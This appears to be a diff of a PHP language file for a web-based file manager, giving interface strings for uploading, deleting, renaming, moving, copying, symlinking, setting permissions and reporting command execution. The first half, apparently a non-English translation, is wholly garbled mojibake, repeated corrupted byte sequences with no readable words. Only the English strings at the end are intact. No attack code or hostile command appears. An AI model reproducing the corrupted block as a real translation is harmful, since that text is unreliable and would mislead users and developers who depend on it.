+'change' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'save' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'set' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'reset' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'relative' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+
+'yes' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'no' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'back' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'destination' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'symlink' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'no_output' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+
+'user' => '����¯�¿�½������°����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'password' => '����¯�¿�½������°����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'add' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'add_basic_auth' => '����¯�¿�½������¤����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ HTTP-Basic-Auth',
+
+'uploaded' => '"[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½.',
+'not_uploaded' => '"[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½.',
+'already_exists' => '"[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½.',
+'created' => '"[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½.',
+'not_created' => '"[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½.',
+'really_delete' => '����¯�¿�½������¤����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½?',
+'deleted' => "����¯�¿�½������³����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½:\n[%1]",
+'not_deleted' => "����¯�¿�½������³����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½:\n[%1]",
+'rename_file' => '����¯�¿�½������°����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½:',
+'renamed' => '"[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ "[%2]".',
+'not_renamed' => '"[%1] ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ "[%2]".',
+'move_files' => '����¯�¿�½������°����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½:',
+'moved' => "����¯�¿�½������³����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ \"[%2]\":\n[%1]",
+'not_moved' => "����¯�¿�½������³����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ \"[%2]\":\n[%1]",
+'copy_files' => '����¯�¿�½������«����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½:',
+'copied' => "����¯�¿�½������³����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ \"[%2]\" :\n[%1]",
+'not_copied' => "����¯�¿�½������³����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ \"[%2]\" :\n[%1]",
+'not_edited' => '"[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½.',
+'executed' => "\"[%1]\" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½:\n{%2}",
+'not_executed' => "\"[%1]\" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½:\n{%2}",
+'saved' => '"[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½.',
+'not_saved' => '"[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½.',
+'symlinked' => '����¯�¿�½������³����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½ "[%2]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ "[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½.',
+'not_symlinked' => '����¯�¿�½������®����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½ "[%2]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ "[%1]".',
+'permission_for' => '����¯�¿�½������°����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ "[%1]":',
+'permission_set' => '����¯�¿�½������°����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ "[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ [%2].',
+'permission_not_set' => '����¯�¿�½������®����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½ "[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ [%2] .',
+'not_readable' => '"[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½.'
+		);
+
+	case 'en':
+	default:
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Directory',
+'file' => 'File',
+'filename' => 'Filename',
+
+'size' => 'Size',
+'permission' => 'Permission',
+'owner' => 'Owner',
+'group' => 'Group',
+'other' => 'Others',
+'functions' => 'Functions',
+
+'read' => 'read',
+'write' => 'write',
+'execute' => 'execute',
+
+'create_symlink' => 'create symlink',
+'delete' => 'delete',
+'rename' => 'rename',
+'move' => 'move',
+'copy' => 'copy',
+'edit' => 'edit',
+'download' => 'download',
+'upload' => 'upload',
+'create' => 'create',
+'change' => 'change',
+'save' => 'save',
+'set' => 'set',
+'reset' => 'reset',
+'relative' => 'Relative path to target',
+
+'yes' => 'Yes',
+'no' => 'No',
+'back' => 'back',
+'destination' => 'Destination',
+'symlink' => 'Symlink',
+'no_output' => 'no output',
+
+'user' => 'User',
+'password' => 'Password',
+'add' => 'add',
+'add_basic_auth' => 'add basic-authentification',
+
+'uploaded' => '"[%1]" has been uploaded.',
+'not_uploaded' => '"[%1]" could not be uploaded.',
+'already_exists' => '"[%1]" already exists.',
+'created' => '"[%1]" has been created.',
+'not_created' => '"[%1]" could not be created.',
+'really_delete' => 'Delete these files?',
+'deleted' => "These files have been deleted:\n[%1]",
+'not_deleted' => "These files could not be deleted:\n[%1]",
+'rename_file' => 'Rename file:',
+'renamed' => '"[%1]" has been renamed to "[%2]".',
+'not_renamed' => '"[%1] could not be renamed to "[%2]".',
+'move_files' => 'Move these files:',
+'moved' => "These files have been moved to \"[%2]\":\n[%1]",
+'not_moved' => "These files could not be moved to \"[%2]\":\n[%1]",
+'copy_files' => 'Copy these files:',
+'copied' => "These files have been copied to \"[%2]\":\n[%1]",
+'not_copied' => "These files could not be copied to \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" can not be edited.',
+'executed' => "\"[%1]\" has been executed successfully:\n{%2}",
+'not_executed' => "\"[%1]\" could not be executed successfully:\n{%2}",
+'saved' => '"[%1]" has been saved.',
+'not_saved' => '"[%1]" could not be saved.',
